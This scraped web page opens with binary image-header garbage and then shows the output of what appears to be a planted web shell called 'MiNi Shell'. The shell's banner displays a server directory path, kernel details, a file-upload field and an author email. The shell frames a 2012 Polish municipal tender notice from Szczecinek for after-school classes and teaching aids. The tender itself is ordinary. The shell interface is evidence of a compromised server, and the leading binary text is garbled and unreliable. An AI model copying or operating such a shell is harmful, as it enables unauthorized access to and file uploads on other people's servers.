JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120806/288118-N-2012.html

<p class="kh_header"><b>Szczecinek: Prowadzenie zajęć dodatkowych oraz zakup pomocy dydaktycznych dla uczniów klas I-III objętych wsparciem w ramach projektu POKL 9.1.2
Wsparcie na starcie - indywidualizacja programu nauczania w klasach I-III 
WND-POKL.09.01.02-32-15211</b><br>
<b>Numer ogłoszenia: 288118 - 2012; data zamieszczenia: 06.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Szczecinek , Plac Wolności 13, 78-400 Szczecinek, woj. zachodniopomorskie, tel. 094 3714129, faks 094 3740254.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczecinek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć dodatkowych oraz zakup pomocy dydaktycznych dla uczniów klas I-III objętych wsparciem w ramach projektu POKL 9.1.2
Wsparcie na starcie - indywidualizacja programu nauczania w klasach I-III 
WND-POKL.09.01.02-32-15211.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie składa się z dwóch zadań. Pierwsze zadanie polega na dostarczeniu usług edukacyjnych w postaci zajęć pozalekcyjnych i wyrównawczych dla uczniów klas I-III pięciu szkół podstawowych, dla których organem założycielskim jest Miasto Szczecinek.
Drugie zadanie to zakup pomocy naukowych dla szkół objętych projektem. Zamawiający nie dopuszcza możliwości składania ofert częściowych na jedno lub dwa zadania.

ZADANIE 1

1. Przedmiotem zamówienia jest zakup usług edukacyjnych obejmujących przeprowadzenie 3172 godzin zajęć pozalekcyjnych w ramach projektu indywidualizacji procesu nauczania i wychowania uczniów klas I-III szkół podstawowych pt. Wsparcie na starcie - indywidualizacja programu nauczania w klasach I-III WND-POKL.09.01.02-32-152/11 dofinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych, w roku szkolnym 2011/12 oraz 2012/13, w szkołach podstawowych Miasta Szczecinek
2. Osoby prowadzące poszczególne zajęcia muszą spełniać następujące warunki:
a) Kwalifikacje dla odpowiedniej części zamówienia muszą być zgodne z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku (Dz.U. z 2009r Nr 50, poz. 400) 
w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli. Wykonawcy muszą posiadać przynajmniej stopień awansu zawodowego na nauczyciela kontraktowego oraz ukończone formy doskonalenia zawodowego zgodnie z rodzajem prowadzonych zajęć (dyplom ukończenia studiów podyplomowych lub kurs kwalifikacyjny).
b) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w zakresie
logopedii lub uprawnienia do prowadzenia zajęć logopedycznych: studia podyplomowe
w zakresie logopedii lub kurs kwalifikacyjny dający uprawnienia do prowadzenia zajęć
logopedycznych (dotyczy zajęć logopedycznych dla dzieci z zaburzeniami rozwoju
mowy),
c) uprawnienia do prowadzenia zajęć z gimnastyki korekcyjnej: studia podyplomowe
w zakresie gimnastyki korekcyjnej lub kurs kwalifikacyjny dający uprawnienia do
prowadzenia zajęć z gimnastyki korekcyjnej (dotyczy zajęć dla uczniów z gimnastyki
korekcyjnej),
d) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym i kwalifikacje
w zakresie prowadzenia zajęć socjoterapeutycznych (dotyczy zajęć dla uczniów z
zaburzeniami komunikacji społecznej, mających trudności z prawidłowym
funkcjonowaniem w szkole i w grupie rówieśniczej),
e) minimum trzyletnie doświadczenie w wykonywaniu usług o charakterze jak przedmiot
niniejszego zamówienia - dotyczy odpowiednio zajęć dla uczniów z trudnościami w
czytaniu i pisaniu, zajęć dla uczniów z trudnościami w zdobywaniu umiejętności
matematycznych, zajęć dla uczniów uzdolnionych rozwijających zainteresowania
matematyczno-przyrodnicze, zajęć dla uczniów uzdolnionych rozwijających
zainteresowania artystyczne.

3. Zakres, ilość i rodzaj zajęć określają szczegółowe działania stanowiące części zamówienia. Czas trwania jednej godziny zajęć określa się jako 45 minut.

4. Zamawiający nie dopuszcza możliwości składania ofert częściowych. 

5. Zajęcia odbywają się w obiektach zamawiającego z wykorzystaniem pomocy naukowych 
i sprzętu będącego na wyposażeniu sal dydaktycznych.

6. Wykaz działań przedmiotowego zadania:

I. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy.
Prowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy w szkołach
podstawowych:
Część I.1 - SP nr 1:		 	210 h, 7 grup
Część I.2 - SP nr 4: 		 	  96 h, 3 grupy
Część I.3 - SP nr 6: 			288 h, 9 grup
Część I.4 - SP nr 7: 			450 h, 3 grupy
Część I.5 - SP Integracyjna: 		  32 h, 2 grupy

Łącznie 24 grupy - razem 1076 godzin.
Program zajęć ma obejmować: usprawnianie narządów artykulacji, wywoływanie, utrwalanie
i automatyzacja głosek, ćwiczenia słuchu fonematycznego, analizy i syntezy słuchu,
kształtowanie i rozwijanie umiejętności komunikowania się z otoczeniem, usprawnienie
umiejętności szkolnych.

II. Zajęcia dla uczniów z trudnościami w czytaniu i pisaniu - dysleksja.
Prowadzenie zajęć dla uczniów z trudnościami w czytaniu i pisaniu w szkołach
podstawowych:

Część II.1 - SP nr 4: 		 	  96 h, 3 grupy
Część II.2 - SP nr 6: 			  96 h, 3 grupy
Część II.3 - SP nr 7: 			270 h, 9 grup
Część II.4 - SP Integracyjna: 		  32 h, 2 grupy

Łącznie: 17 grup, 494 godziny.
Program zajęć ma obejmować: ćwiczenia poprawiające percepcję wzrokową i słuchową,
utrwalanie liter, ćwiczenia zwiększające tempo czytania, stopień rozumienia tekstu, metodę
sylabową, ćwiczenia w pisaniu z pamięci i ze słuchu, manualne, graficzne.

III. Zajęcia dla uczniów z trudnościami w zdobywaniu umiejętności matematycznych.
Prowadzenie zajęć dla uczniów z trudnościami w zdobywaniu umiejętności matematycznych
w szkołach podstawowych:

Część III.1 - SP nr 4: 		 	  96 h, 3 grupy
Część III.2 - SP nr 7: 			270 h, 9 grup
Część III.3 - SP Integracyjna: 		  32 h, 2 grupa

Łącznie: 14 grup, 398 godziny.
Program zajęć ma obejmować: ćwiczenia w zakresie czynnościowego nauczania matematyki, usprawnianie techniki rachunkowej, logicznego myślenia, rozwiązywania zadań tekstowych, rozwijanie umiejętności praktycznych uczniów.

IV. Zajęcia dla uczniów uzdolnionych rozwijających zainteresowania matematyczno-przyrodnicze
Prowadzenie zajęć dla uczniów szczególnie uzdolnionych w szkołach podstawowych:

Część IV.1 - SP nr 4: 		 	  96 h, 3 grupy
Część IV.2 - SP nr 6: 			  96 h, 3 grupy
Część IV.3 - SP nr 7: 			180 h, 6 grupy

Łącznie 12 grup, 372 godzin.
Program zajęć ma obejmować: rozwiązywanie złożonych zadań tekstowych, gry i zabawy
matematyczno-logiczne, doświadczenia i obserwacje dotyczące świata zwierząt i roślin,
ekologii, zdrowia i higieny.

V. Zajęcia dla uczniów z gimnastyki korekcyjnej.
Prowadzenie zajęć dla uczniów z gimnastyki korekcyjnej w szkołach podstawowych:

Część V.1 - SP nr 4: 		 	  64 h, 2 grupy
Część V.2 - SP nr 6: 			288 h, 9 grupy
Część V.3 - SP nr 7: 			120 h, 4 grup
Część V.4 - ISP: 				  64 h, 2 grupy

Łącznie: 17 grup, 536 godziny.
Program zajęć ma obejmować: kształtowanie prawidłowej postawy ciała u uczniów, nauka
ćwiczeń wzmacniających poszczególne partie mięśni, zabawy i gry ruchowe z elementami
korektywy.

VI. Zajęcia rozwijające dla uczniów uzdolnionych artystycznie
Prowadzenie zajęć dla uczniów w szkole podstawowej:

     Część VI.1 - SP nr 1:		 		180 h, 6 grup

Łącznie: 6 grup, 180 godzin
Program zajęć ma obejmować: wyczulanie na piękno słowa mówionego, ćwiczenie gestów i
mimiki twarzy oraz zapoznanie uczniów z terminologią sztuki teatralnej. Zajęcia z plastyki, doskonalenie warsztatu malarskiego, historia sztuki.

VII. Zajęcia socjoterapeutyczne dla uczniów z zaburzeniami komunikacji społecznej, mających trudności z prawidłowym funkcjonowaniem w szkole i w grupie rówieśniczej.
Prowadzenie zajęć w szkołach podstawowych:

Część VII.1 - SP nr 1: 			90 h, 3 grupy
Część VII.2 - SP nr integracyjna: 		90 h, 3 grupy

Łącznie: 6 grup, 180 godzin
Program zajęć ma obejmować: zmianę patologicznych wzorców zachowań i zmniejszenie
poziomu zaburzeń zachowań u dzieci, poprzez:
- kształtowanie umiejętności rozpoznawania własnych i cudzych uczuć, wyrażania uczuć,
- kształtowanie umiejętności dostrzegania swoich mocnych stron, widzenia różnic i
podobieństw między ludźmi,
- zwiększenie poczucia własnej wartości,
- kształtowanie umiejętności skutecznego porozumiewania się, wyrażania swoich myśli i
uczuć, rozwiązywania problemów i podejmowania decyzji, umiejętności interpersonalnych,

ZADANIE II

1.	Dostarczenie do szkół objętych wsparciem w ramach projektu pomocy naukowych do poszczególnych rodzajów zajęć w nich realizowanych, zgodnie ze szczegółowym opisem przedmiotu zamówienia stanowiącym Załącznik Nr 1. do SIWZ.

2.	Dostarczone pomoce naukowe powinny być właściwej jakości, fabrycznie nowe i mogą być używane bez naruszenia praw własności osób trzecich, w tym praw patentowych i praw autorskich;

3.	Wszystkie obowiązki i czynności wynikające z zakresu zamówienia Wykonawca zapewni na swój koszt i w swoim zakresie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 39.16.21.00-6, 32.32.00.00-2, 30.24.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunków art. 22 ust. 1 Prawa zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie w ciągu ostatnich 5 lat przed upływem terminu składania ofert min. 1 usługi szkoleniowej/edukacyjnej o wartości nie mniejszej niż 50.000,00 zł brutto, z potwierdzeniem jej prawidłowej realizacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Spis treści;
2.	Wypełniony formularz ofertowy;
3.	Oryginał lub kopia poświadczona notarialnie pełnomocnictwa do składania oświadczeń w imieniu wykonawcy, w przypadku ustanowienia pełnomocnika;
4.	Wykaz części zamówienia, których wykonanie wykonawca powierzy podwykonawcom z określeniem rodzaju, zakresu i ilości;.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczecinek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Szczecinku, Plac Wolności 13, 78-400 Szczecinek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 10:00, miejsce: Biuro Obsługi Interesanta Urzędu Miasta Szczecinka, Plac Wolności 13, 78-400 Szczecinek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> dofinansowane ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com